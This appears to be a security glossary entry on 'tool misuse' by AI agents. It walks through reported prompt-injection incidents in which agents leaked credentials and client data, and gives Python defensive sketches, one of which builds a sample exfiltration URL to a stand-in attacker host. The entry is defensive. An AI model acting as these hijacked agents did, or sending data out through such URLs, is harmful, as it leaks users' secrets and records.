
Tool Misuse

attack · tool use · privilege escalation · exfiltration
Ofir Stein·Updated March 4, 2026

Tool misuse (in the AI agent context) is an attack in which an adversary manipulates an agent into using its legitimate, authorized tools in unintended ways — turning approved capabilities into exfiltration channels, privilege escalation vectors, or mechanisms for unauthorized harm. The tools work exactly as designed. That's the problem.


What Is Tool Misuse?

AI agents are powerful because they can use tools: call APIs, search the web, execute code, read and write files, send messages, query databases. Tool use is the mechanism by which agents affect the world.

Tool misuse exploits the gap between what a tool is authorized for and what that tool can physically do. Authorization is defined by policy ("this tool should only be used for X"). Capability is defined by reality ("this tool can physically do Y, Z, and also X"). An attacker who can influence the agent's reasoning — via prompt injection, poisoned memory, or manipulated task context — can direct the agent to use a tool in its full capability range, not just its intended range.

The critical distinction from other attack types: the agent isn't doing anything it wasn't technically allowed to do. The tool access is real. The tool call is valid. The harm is entirely a function of the agent being directed toward a use case the designer didn't intend.


Why Authorization and Capability Diverge

When developers give an agent a tool, they think about what the tool is for. Security teams think about what the tool can do. Those are different questions, and in production systems they're almost never fully reconciled.

Examples of the gap:

  • A web search tool is for finding information. It can also make arbitrary HTTP GET requests, with user-controlled query parameters, to any URL — including attacker-controlled endpoints. If the URL includes exfiltrated data in the query string, web search becomes an exfiltration channel.
  • A code execution tool is for running legitimate code. It can also write to arbitrary filesystem paths, make outbound network connections, and spawn subprocesses that bypass file access policies applied at the agent layer.
  • A send-message tool is for notifying users. It can also send messages to arbitrary recipients, including external parties and attacker-controlled webhooks.
  • A database query tool is for reading relevant records. It can also, if permissions aren't scoped, access every record in the database.
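The first item in the list above can be made concrete. This is a minimal sketch using an invented `web_search` tool and hypothetical hostnames; it builds the URLs a misused search tool would fetch rather than issuing real HTTP requests:

```python
from urllib.parse import urlencode, urlparse, parse_qs

def web_search(url: str) -> str:
    """Intended use: fetch search results. Actual capability: GET any URL."""
    # A real agent tool would issue an HTTP GET here; we return the URL
    # it would fetch, to show what the capability physically permits.
    return url

# Legitimate use: a query against an approved search endpoint.
legit = "https://search.example.com/?" + urlencode({"q": "quarterly report"})

# Misuse: an injected instruction tells the agent to "search" an
# attacker-controlled URL carrying exfiltrated data as a query parameter.
stolen = "alice@corp.com,bob@corp.com"   # e.g. a client list from context
exfil = "https://attacker.example.net/log?" + urlencode({"data": stolen})

# Both calls are valid tool invocations; only the second is an attack.
for url in (web_search(legit), web_search(exfil)):
    print(urlparse(url).netloc, parse_qs(urlparse(url).query))
```

Nothing in the tool distinguishes the two calls — the distinction exists only in the designer's intent, which is exactly the gap tool misuse exploits.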

Real Examples

Google Antigravity IDE (November 2025). Gemini, manipulated via prompt injection in a poisoned web page, collected AWS credentials from the workspace's .env file. The file access tool was blocked from reading files listed in .gitignore. The attacker's payload recognized this constraint and used the run_command tool instead — a shell execution tool that operated below the file access policy layer. Two tools, each with legitimate use cases. Combined under adversarial direction, they became a credential exfiltration chain.

Notion 3.0 (September 2025). Notion's AI agent had a web search tool for looking up information. Hidden text in a PDF instructed the agent to search for a specific URL — one that included the victim's client list as a query parameter. The search tool fetched the URL. The attacker's server logged the query parameters. The client list was exfiltrated via a search that "succeeded" from the tool's perspective.

Salesforce AgentForce (September 2025). A malicious Web-to-Lead form submission triggered the agent to use its legitimate lead-management tools to exfiltrate lead contact data to an expired domain that had been re-registered by the attacker. The domain was still in Salesforce's CSP allowlist. The exfiltration was, from the tool's perspective, a valid outbound call to an approved domain.


Defense

Tool misuse can't be fully stopped at the behavioral layer — you can't write a system prompt that covers every possible misuse of every tool. The structural approach:

Minimal tool scope. Give agents only the tools they need for the specific task. An agent that summarizes documents doesn't need outbound HTTP capabilities. An agent that answers customer questions doesn't need database write access.
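One way to enforce this structurally is to resolve the tool set per task rather than per agent, with a default-deny fallback. A minimal sketch, with invented task and tool names:

```python
# Hypothetical task-to-tools mapping; names are illustrative only.
TASK_TOOL_SCOPES = {
    "summarize_document": {"read_file", "summarize"},  # no outbound HTTP
    "answer_faq": {"kb_search"},                       # no database writes
}

def tools_for_task(task: str) -> set:
    # Default-deny: an unrecognized task gets no tools at all.
    return TASK_TOOL_SCOPES.get(task, set())

def invoke(task: str, tool: str) -> str:
    if tool not in tools_for_task(task):
        raise PermissionError(f"tool {tool!r} not in scope for task {task!r}")
    return f"ran {tool}"

print(invoke("summarize_document", "read_file"))  # in scope: allowed
try:
    invoke("summarize_document", "http_get")      # out of scope: blocked
except PermissionError as e:
    print(e)
```

Because the check lives in the runtime, not the prompt, a manipulated agent cannot reason its way into a tool the task was never granted.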

Outbound egress controls. Treat agent outbound network calls as a security boundary, not a convenience feature. Enforce allowlists at the network layer, not just in the system prompt. Audit what domains agents actually call in production.
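A sketch of the allowlist check, enforced in the tool runtime rather than the prompt (hostnames are assumptions; a real deployment would enforce this at the network layer as well, since exact-match hostname checks can be bypassed by redirects or DNS tricks):

```python
from urllib.parse import urlparse

# Hypothetical approved egress destinations.
EGRESS_ALLOWLIST = {"search.example.com", "api.internal.example.com"}

def guarded_get(url: str) -> str:
    host = urlparse(url).hostname or ""
    if host not in EGRESS_ALLOWLIST:
        raise PermissionError(f"egress to {host!r} denied")
    # Real code would issue the request here (e.g. via an HTTP client);
    # the check above runs regardless of what the model was told.
    return f"GET {url}"

print(guarded_get("https://search.example.com/?q=report"))
try:
    guarded_get("https://attacker.example.net/log?data=secrets")
except PermissionError as e:
    print(e)
```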

Tool call logging and anomaly detection. Every tool call should be logged with full arguments. Unusual tool invocations — a search query with a long random-looking string as the search term, a file write to a path outside the expected workspace — should trigger review.
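The "long random-looking string" heuristic can be approximated with a character-entropy check on tool arguments. A minimal sketch — the token length cutoff and entropy threshold below are illustrative, not tuned values:

```python
import json
import math
import re
from collections import Counter

def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s))
                for c in counts.values()) if s else 0.0

def suspicious(arg: str) -> bool:
    # Long, high-entropy tokens (e.g. base64 blobs) often indicate
    # encoded exfiltration payloads smuggled into tool arguments.
    tokens = re.findall(r"\S{24,}", arg)
    return any(shannon_entropy(t) > 4.0 for t in tokens)

def log_tool_call(tool: str, args: dict) -> dict:
    record = {"tool": tool, "args": args,
              "flagged": any(suspicious(str(v)) for v in args.values())}
    print(json.dumps(record))  # every call logged with full arguments
    return record

ok = log_tool_call("web_search", {"q": "quarterly report 2025"})
bad = log_tool_call("web_search",
    {"q": "aGVsbG8gd29ybGQgc2VjcmV0IGNyZWRlbnRpYWxzIGV4ZmlsdHJhdGlvbg=="})
```

Flagged calls would feed a review queue; entropy alone produces false positives (hashes, IDs), so in practice it is one signal among several.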

Segregation of powerful tools. Tools with significant capability (code execution, file write, external HTTP) should require explicit task-level justification and, for high-stakes operations, human approval. Don't co-locate powerful tools with untrusted-content processing.
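An approval gate for powerful tools can be sketched as a tier check in the execution path (tool names and the two-tier split are invented for illustration):

```python
# Hypothetical high-capability tier requiring explicit approval.
POWERFUL = {"run_command", "write_file", "http_post"}

def execute(tool: str, args: dict, approver=None) -> str:
    if tool in POWERFUL:
        # approver is a callback representing a human (or stricter
        # policy engine) that sees the exact tool and arguments.
        if approver is None or not approver(tool, args):
            raise PermissionError(f"{tool} requires approval")
    return f"executed {tool}"

print(execute("kb_search", {"q": "pricing"}))          # read-only: no gate
try:
    execute("run_command", {"cmd": "ls"})              # gated: blocked
except PermissionError as e:
    print(e)
print(execute("run_command", {"cmd": "ls"},            # gated: approved
              approver=lambda tool, args: True))
```

The key property is that approval is attached to the tool call itself, with its real arguments, after the agent has decided what to do — not to the task description the attacker may have shaped.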


FAQ

Is tool misuse the same as prompt injection? Prompt injection is usually the mechanism; tool misuse is often the consequence. An attacker uses prompt injection to influence the agent's reasoning, then the agent executes the attack via tool misuse. They're distinct concepts but frequently co-occur in real attacks.

Can tool call signing prevent this? Signing tool calls (so that only verified tool invocations execute) would help, but it doesn't exist in current production frameworks. Even if it did, it would prevent unauthorized tool access — not the misuse of authorized access.

Does least-privilege access actually help if the agent is already compromised? Yes — this is the entire point. If the agent can only search, it can't exfiltrate via file reads or code execution. If the search tool only calls approved domains, it can't exfiltrate to attacker infrastructure. Structural controls limit damage even after compromise. That's the definition of blast radius containment.